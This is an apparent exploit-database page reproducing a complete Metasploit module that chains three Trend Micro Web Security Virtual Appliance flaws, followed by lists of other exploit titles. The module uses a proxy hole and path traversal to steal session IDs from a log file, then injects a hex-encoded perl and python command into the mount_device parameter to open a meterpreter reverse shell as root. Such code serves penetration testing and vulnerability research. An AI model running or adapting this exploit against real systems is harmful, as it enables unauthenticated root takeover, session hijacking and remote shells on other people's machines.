Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"

Author

Exploit author

"Mehmet Ince"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-14

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
  
    include Msf::Exploit::Remote::HttpClient
  
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
          'Description' => %q{
            This module exploits multiple vulnerabilities together in order to achive a remote code execution.
            Unauthenticated users can execute a terminal command under the context of the root user.
  
            The specific flaw exists within the LogSettingHandler class of administrator interface software.
            When parsing the mount_device parameter, the process does not properly validate a user-supplied string
            before using it to execute a system call. An attacker can leverage this vulnerability to execute code in
            the context of root. But authentication is required to exploit this vulnerability.
  
            Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
            can exploit this vulnerability in order to communicate with internal services in the product.
  
            Last but not least a flaw exists within the Apache Solr application, which is installed within the product.
            When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
            An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
  
            Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
  
            Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
            ],
          'References' =>
            [
              ['CVE', '2020-8604'],
              ['CVE', '2020-8605'],
              ['CVE', '2020-8606'],
              ['ZDI', '20-676'],
              ['ZDI', '20-677'],
              ['ZDI', '20-678']
            ],
          'Privileged' => true,
          'DefaultOptions' =>
            {
              'SSL' => true,
              'payload' => 'python/meterpreter/reverse_tcp',
              'WfsDelay' => 30
            },
          'Payload' =>
            {
              'Compat' =>
              {
                'ConnectionType' => '-bind'
              }
            },
          'Platform' => ['python'],
          'Arch' => ARCH_PYTHON,
          'Targets' => [ ['Automatic', {}] ],
          'DisclosureDate' => '2020-06-10',
          'DefaultTarget' => 0,
          'Notes' =>
            {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
        )
      )
  
      register_options(
        [
          Opt::RPORT(8443),
          OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
        ]
      )
    end
  
    def hijack_cookie
      # Updating SSL and RPORT in order to communicate with HTTP proxy service.
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end
      port_restore = datastore['RPORT']
      datastore['RPORT'] = datastore['PROXY_PORT']
  
      @jsessionid = ''
  
      # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
      print_status('Trying to extract session ID by exploiting reverse proxy service')
  
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
        'vars_get' => {
          'command' => 'filecontent',
          'wt' => 'filestream',
          'generation' => 1,
          'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
        }
      })
  
      # Restore variables and validate extracted sessionid
      datastore['SSL'] = true if ssl_restore
      datastore['RPORT'] = port_restore
  
      # Routine check on res object
      unless res
        fail_with(Failure::Unreachable, 'Target is unreachable.')
      end
  
      # If the res code is not 200 that means proxy service is not vulnerable.
      unless res.code == 200
        @jsessionid = -1
        return
      end
  
      # Now we are going to extract all JESSIONID from log file and store them in array.
      cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten
  
      if cookies.empty?
        @jsessionid = 0
        print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
        return
      end
  
      print_good("Extracted number of JSESSIONID: #{cookies.length}")
  
      # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
      datastore['SSL'] = true if ssl_restore
      datastore['RPORT'] = port_restore
  
      # Latest cookie in the log file is the one most probably active. So that we use reverse on array.
      cookies.reverse.each_with_index do |cookie, index|
        print_status("Testing JSESSIONID ##{index} : #{cookie}")
  
        # This endpoints is basically check session :)
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
          'cookie' => "JSESSIONID=#{cookie}"
        })
  
        # Routine res check
        unless res
          fail_with(Failure::UnexpectedReply, 'Target is unreachable.')
        end
  
        # If the cookie is active !
        if res.code == 200 && res.body.include?('session_flag')
          print_good("Awesome!!! JESSIONID ##{index} is active.")
          @jsessionid = cookie
          break
        end
  
        print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
      end
  
      if @jsessionid.empty?
        print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
      end
    end
  
    def check
      #
      # @jsessionid can be one of the following value
      #
      # -1 = Proxy service is not vulnerable, which means we'r not gonna
      # be able to read catalina.out
      #
      # 0  = Proxy service is vulnerable, but catalina.out does not contain any
      # jessionid string yet !
      #
      # empty = Proxy service is vulnerable, but jessionid within log file but
      # none of them are valid:(
      #
      # string = Proxy service is vulnerable and sessionid is valid !
      #
      hijack_cookie
  
      if @jsessionid == -1
        CheckCode::Safe
      else
        CheckCode::Vulnerable
      end
    end
  
    def exploit
  
      unless check == CheckCode::Vulnerable
        fail_with Failure::NotVulnerable, 'Target is not vulnerable'
      end
  
      #
      # 0     => Proxy service is vulnerable, but catalina.out does not contain any
      # jessionid string yet !
      #
      # empty => Proxy service is vulnerable, but jessionid within log file but
      # none of them are valid:(
      #
      if @jsessionid.empty? || @jessionid == 0
        fail_with Failure::NoAccess, ''
      end
  
      print_status('Exploiting command injection vulnerability')
  
      # Yet another app specific bypass is going on here.
      # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
      # For that reason, I am planting our payload dropper within the perl command.
  
      cmd = "python -c \"#{payload.encoded}\""
      final_payload = cmd.to_s.unpack1('H*')
      p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
  
      vars_post = {
        mount_device: "mount $(#{p}) /var/offload",
        cmd: 'mount'
      }
  
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
        'cookie' => "JSESSIONID=#{@jsessionid}",
        'ctype' => 'application/json',
        'data' => vars_post.to_json
      })
    end
  end
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-20 "WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)" webapps multiple n1x_
2020-10-14 "NodeBB Forum 1.12.2-1.14.2 - Account Takeover" webapps multiple "Muhammed Eren Uygun"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-05 "MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection" webapps multiple "Aviv Beniash"
2020-09-28 "Joplin 1.0.245 - Arbitrary Code Execution (PoC)" webapps multiple "Ademar Nowasky Junior"
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-22 "Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution" webapps multiple "Milad Fadavvi"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
Release Date Title Type Platform Author
2020-07-14 "Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)" webapps multiple "Mehmet Ince"
2020-04-06 "Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)" webapps multiple "Mehmet Ince"
2019-01-07 "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2018-07-24 "Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)" webapps php "Mehmet Ince"
2018-06-26 "Liferay Portal < 7.0.4 - Server-Side Request Forgery" webapps java "Mehmet Ince"
2018-03-12 "ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)" webapps java "Mehmet Ince"
2018-01-04 "Xplico - Remote Code Execution (Metasploit)" remote linux "Mehmet Ince"
2017-10-11 "Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)" webapps php "Mehmet Ince"
2017-10-11 "Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)" webapps php "Mehmet Ince"
2017-09-19 "DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)" webapps linux "Mehmet Ince"
2017-09-12 "osTicket 1.10 - SQL Injection (PoC)" webapps php "Mehmet Ince"
2017-06-26 "Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2017-05-09 "Crypttech CryptoLog - Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2017-03-24 "Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)" remote python "Mehmet Ince"
2017-03-17 "SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)" remote linux "Mehmet Ince"
2017-01-31 "AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)" webapps php "Mehmet Ince"
2017-01-15 "Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)" webapps multiple "Mehmet Ince"
2017-01-08 "ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities" webapps java "Mehmet Ince"
2016-09-21 "Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)" remote php "Mehmet Ince"
2016-07-25 "Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)" webapps php "Mehmet Ince"
2016-07-20 "Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)" remote php "Mehmet Ince"
2016-07-11 "Tiki Wiki 15.1 - File Upload (Metasploit)" remote php "Mehmet Ince"
2016-06-27 "BigTree CMS 4.2.11 - SQL Injection" webapps php "Mehmet Ince"
2016-06-15 "BookingWizz Booking System < 5.5 - Multiple Vulnerabilities" webapps php "Mehmet Ince"
2016-05-24 "AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection" webapps asp "Mehmet Ince"
2014-04-24 "Bonefire 0.7.1 - Reinstall Admin Account" webapps php "Mehmet Ince"
2014-04-22 "No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key" webapps php "Mehmet Ince"
2012-05-01 "WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting" webapps php "Mehmet Ince"
2012-04-27 "SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection" webapps php "Mehmet Ince"
2012-04-26 "WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Mehmet Ince"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48667/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.